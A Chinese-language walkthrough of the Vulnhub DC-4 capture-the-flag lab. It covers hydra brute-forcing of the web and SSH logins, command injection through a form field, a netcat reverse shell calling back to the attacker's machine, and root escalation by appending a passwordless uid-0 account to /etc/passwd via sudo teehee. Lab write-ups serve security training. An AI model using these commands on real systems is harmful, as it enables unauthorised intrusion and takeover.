VulnhubDC-4

描述：

只有一个标志，但从技术上讲，有多个入口点，就像上次一样，没有线索。

192.168.37.133

 

直接 submit 就可以登录

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f

 

 radio=ls+-l&submit=Run

 radio=du+-h&submit=Run

 nc 192.168.37.128 6666 -e /bin/bash

 

python -c "import pty; pty.spawn('/bin/bash')"

三个可登录用户 

到目前可能就只能爆破，而在根目录下找到两个敏感目录

root

home

但是 root 目录不够权限，而 home 目录可以进入，且发现该目录下的三个

 

192.168.37.133

 

 

 

#!/bin/bash
for i in {1..5}
do
         sleep 1
         echo "Learn bash they said."
         sleep 1
         echo "Bash is good they said."
done
         echo "But I'd rather bash my head against a brick wall."

 

 

 hydra -l jim -P DC-4_passwd.txt 192.168.37.133 ssh

[22][ssh] host: 192.168.37.133   login: jim   password: jibril04

ssh jim@192.168.37.133

Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100

登陆后提示发现是 Linux 系统且有一封邮件

cat mbox

这是邮件描述

From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path:
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
            (envelope-from )
            id 1hCiQe-0000gc-EC
            for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id:
From: root
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

由于 Linux 系统

linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客系收到邮件都会保存在“/var/spool/mail/[linux用户名]”文件中。linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客

cat jim 

 

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path:
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
            (envelope-from )
            id 1hCjIX-0000kO-Qt
            for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id:
From: Charles
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

可以从邮件中知道查尔斯给 jim 留下了密码，Charles 也同样是我们之前所得到的三个用户之一

su charles

 

可以看到第一个命令为 -a，可以不用覆盖原内容将东西直接加入到指定文件

第三个域为 root 的 gid 

 

第二个密码域放空，第三个 uid 和第四个 gid 分别使用 root 的 uid 和 gid，直接添加一个新的管理员在 Linux 用户表中

echo "Sherlock::0:0:::/bin/bash" | sudo teehee -a /etc/passwd